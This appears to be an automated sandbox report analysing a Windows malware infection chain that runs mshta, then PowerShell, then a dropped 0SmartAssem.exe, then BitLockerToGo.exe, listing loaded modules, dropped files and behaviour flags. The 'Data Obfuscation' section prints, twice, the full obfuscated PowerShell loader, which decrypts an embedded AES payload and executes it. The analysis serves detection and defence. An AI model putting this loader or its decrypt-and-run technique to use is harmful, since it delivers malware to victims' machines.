              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb00 source: Qt5SqlVBox.dll.5.dr
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxSharedClipboard\VBoxSharedClipboard.pdb source: VBoxSharedClipboard.dll.5.dr
              Source: Binary string: dialer.pdbGCTL source: mshta.exe, 00000003.00000002.2371336752.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2359272014.0000023769CFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358542351.000002376BED3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2370883950.0000023769CD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2363090899.0000023769D12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367001047.000002376BE02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358000601.000002376BED3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362755173.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2361886828.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358786546.000002376BED5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367001047.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2359185745.000002376BED6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358000601.000002376BE3C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2366555321.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362119831.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2366217044.0000023769D12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2371500355.000002376BE81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362034445.0000023769CC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2359137720.000002376BE81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358226135.000002376BEAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2359272014.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2366801672.000002376BE8D000.00000004.00000020.00020000.00000000.sdmp, smart1[1].3.dr
              Source: Binary string: BitLockerToGo.pdb source: 0SmartAssem.exe, 00000008.00000003.1981482070.0000022BEFA80000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000003.1981404969.0000022BEFD30000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000002.1998133835.000000C0004BB000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5PrintSupportVBox.pdb22 source: Qt5PrintSupportVBox.dll.5.dr
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5PrintSupportVBox.pdb source: Qt5PrintSupportVBox.dll.5.dr
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxSharedFolders\VBoxSharedFolders.pdb source: VBoxSharedFolders.dll.5.dr
              Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxSupLib\VBoxSupLib.pdb source: VBoxSupLib.dll.5.dr
              Source: Binary string: dialer.pdb source: mshta.exe, 00000003.00000002.2371336752.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367001047.000002376BE02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362755173.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2361886828.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367001047.000002376BDEF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2366555321.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362119831.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2362034445.0000023769CC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2359272014.0000023769D58000.00000004.00000020.00020000.00000000.sdmp, smart1[1].3.dr
              Source: Binary string: BitLockerToGo.pdbGCTL source: 0SmartAssem.exe, 00000008.00000003.1981482070.0000022BEFA80000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000003.1981404969.0000022BEFD30000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000002.1998133835.000000C0004BB000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb source: Qt5SqlVBox.dll.5.dr

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('649390CFEBE1770BAA5146DE729123CCD838E758E4276A363F637B3AAF033337AC0657955271E9550F501406601E1A41860E46E19B664FF95794FF1F3D04636BD08F0C38C4B63E80890B016BD8AB0B78879EF113B89A3F38F6F895DE87AEA8D3B7F0CCEB19C1832E835097ECCB2C36890967C12BEB560476870CFCA3B2026770977E5BFC6237BA383AB0C9BC4FEE55E653DB382E41C9866A6C0222D784911F31EBB65E3730429D060FF2E1FCA15D8F85018D75055E5F3D7F26332EE40768EC9BAFDC24FC0691D6B57AB81120A83FF0208197B7794EB8E48F081D5265C2EDE5BE7C897C05ABF2349EBA71B3759948F6CC4E3D2AA8CB8B87BC3EF6DD53F55E24B1A14B06982580B23E1CDC89A89E5FC9AEBCC45162B160BDD6D1DD820E751C213F642E6174AB940A544437CBD4B95F451F49854521B6B5F25DC2958288B9E8AE3E84EC687BF5FD542FD21B03B728755D38B9F795538690A1731AD87A4FF035E0E4DF4D5D5926749BCC457636F04DB20D58FEF916462DCAC2915FF336ECE4C613138832FB8CB53EC4DDA139297818B53354F21F92E9A237CDEA5EBA27FD7E08ABAD8BC364C8AC9D4DA7EF88987044E30E52F804D80E2DCF76EB0C85804D4469E0F07C9E5CE26611DE49AD0BB0333D282354BE10F943982430B1169A615E79E3E0C5EC79DA387AD53EAF2FD764DBB293F0EF18D616EEF99C38992715145D16CA68D09F1D913D460445AD05E1641EE4AC2B1E944F7FF45B6C7C51974DECC8B09B1CCBDC8ED7174A14C70F59EA9B96E93E8A336D668FF3C2DC68D75472553892C38D8F32E86361D381E1EE6E6E1BCA21FA73FC43DDDAFCED280453E7B5D154F59EF2BE213C2656F282EABC6A8D2F17A8B47C539E9817820B02E234FD821466297478CF4C06BF88B97D45DCF3E4C807DE237AD7614DCD6332D4DE950C177646C50F08062E130279ECE8B08C9945A79ECF6C4B88024A24DC840A12E22F404F56B7C13E2F9DC8AADEB49ECC7A67AE9983475129E57AFB8D0F9326B22E9B79AAA56DB3EEC92EA9708998095778497441E15D7795F50116CF78185726E9A7F7A3E40D436D50F77BDA8DDDBFD8CEBB4C758EA3595453635FE911BA9691EB0E2A28529D8C4B9E2D50DD40CBDBC57F9D07995096EB6B48448429C1F014B7BDF9146EC21A79ADA827E6590D159548021642354333FC8154696C9E79B4CDA3E5D22551F1F2387AAA9CE4464C571969727F845599B1BD312EB356A5E140EC6F91912B1227B9F3A941727413D53C0FE2B26DE40BB2B36462055BBF7E8A6B8281CC7FFD4048A1CD97104C3A63FF87CE63106EF7443D01D5FCE1FD67A7E73EE2A8F2CD2EFED7B4A7796DB2328BD317F0349F8B606845CBF4FC0F73D45630EF3466836C0A93133F760481FB4E2F4E46DBFF6A7AA0455989567090A3EBB373F3EC52B5EE0558518BC12408677670492BEA93021308DF47CD62CF99B8E473176B2965284653204CE093A6D8CE56300896793A61754D407EB838A56372881C0664AF37F1E9500BBAC243013C5F5953ABE1CD43347B87C2D6ED6169C7B0D8242DE3ED14C3F856F471A13CEFE0993EE315D5305CC2AC9054976C9CA5A6');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3)
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('649390CFEBE1770BAA5146DE729123CCD838E758E4276A363F637B3AAF033337AC0657955271E9550F501406601E1A41860E46E19B664FF95794FF1F3D04636BD08F0C38C4B63E80890B016BD8AB0B78879EF113B89A3F38F6F895DE87AEA8D3B7F0CCEB19C1832E835097ECCB2C36890967C12BEB560476870CFCA3B2026770977E5BFC6237BA383AB0C9BC4FEE55E653DB382E41C9866A6C0222D784911F31EBB65E3730429D060FF2E1FCA15D8F85018D75055E5F3D7F26332EE40768EC9BAFDC24FC0691D6B57AB81120A83FF0208197B7794EB8E48F081D5265C2EDE5BE7C897C05ABF2349EBA71B3759948F6CC4E3D2AA8CB8B87BC3EF6DD53F55E24B1A14B06982580B23E1CDC89A89E5FC9AEBCC45162B160BDD6D1DD820E751C213F642E6174AB940A544437CBD4B95F451F49854521B6B5F25DC2958288B9E8AE3E84EC687BF5FD542FD21B03B728755D38B9F795538690A1731AD87A4FF035E0E4DF4D5D5926749BCC457636F04DB20D58FEF916462DCAC2915FF336ECE4C613138832FB8CB53EC4DDA139297818B53354F21F92E9A237CDEA5EBA27FD7E08ABAD8BC364C8AC9D4DA7EF88987044E30E52F804D80E2DCF76EB0C85804D4469E0F07C9E5CE26611DE49AD0BB0333D282354BE10F943982430B1169A615E79E3E0C5EC79DA387AD53EAF2FD764DBB293F0EF18D616EEF99C38992715145D16CA68D09F1D913D460445AD05E1641EE4AC2B1E944F7FF45B6C7C51974DECC8B09B1CCBDC8ED7174A14C70F59EA9B96E93E8A336D668FF3C2DC68D75472553892C38D8F32E86361D381E1EE6E6E1BCA21FA73FC43DDDAFCED280453E7B5D154F59EF2BE213C2656F282EABC6A8D2F17A8B47C539E9817820B02E234FD821466297478CF4C06BF88B97D45DCF3E4C807DE237AD7614DCD6332D4DE950C177646C50F08062E130279ECE8B08C9945A79ECF6C4B88024A24DC840A12E22F404F56B7C13E2F9DC8AADEB49ECC7A67AE9983475129E57AFB8D0F9326B22E9B79AAA56DB3EEC92EA9708998095778497441E15D7795F50116CF78185726E9A7F7A3E40D436D50F77BDA8DDDBFD8CEBB4C758EA3595453635FE911BA9691EB0E2A28529D8C4B9E2D50DD40CBDBC57F9D07995096EB6B48448429C1F014B7BDF9146EC21A79ADA827E6590D159548021642354333FC8154696C9E79B4CDA3E5D22551F1F2387AAA9CE4464C571969727F845599B1BD312EB356A5E140EC6F91912B1227B9F3A941727413D53C0FE2B26DE40BB2B36462055BBF7E8A6B8281CC7FFD4048A1CD97104C3A63FF87CE63106EF7443D01D5FCE1FD67A7E73EE2A8F2CD2EFED7B4A7796DB2328BD317F0349F8B606845CBF4FC0F73D45630EF3466836C0A93133F760481FB4E2F4E46DBFF6A7AA0455989567090A3EBB373F3EC52B5EE0558518BC12408677670492BEA93021308DF47CD62CF99B8E473176B2965284653204CE093A6D8CE56300896793A61754D407EB838A56372881C0664AF37F1E9500BBAC243013C5F5953ABE1CD43347B87C2D6ED6169C7B0D8242DE3ED14C3F856F471A13CEFE0993EE315D5305CC2AC9054976C9CA5A6');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3)Jump to behavior
              Source: smart1[1].3.drStatic PE information: 0xC5AA0E47 [Fri Feb 1 14:18:47 2075 UTC]
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_0306BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_0306BA2C
              Source: smart1[1].3.drStatic PE information: real checksum: 0x12283 should be: 0x2b4c9
              Source: 0SmartAssem.exe.5.drStatic PE information: section name: .xdata
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_0306A9F5 push ecx; ret 11_2_0306AA08
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VBoxSharedFolders.dllJump to dropped file
              Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1]Jump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VBoxSharedClipboard.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VBoxVMM.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Qt5SqlVBox.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\0SmartAssem.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VBoxSupLib.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Qt5PrintSupportVBox.dllJump to dropped file
              Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1]Jump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
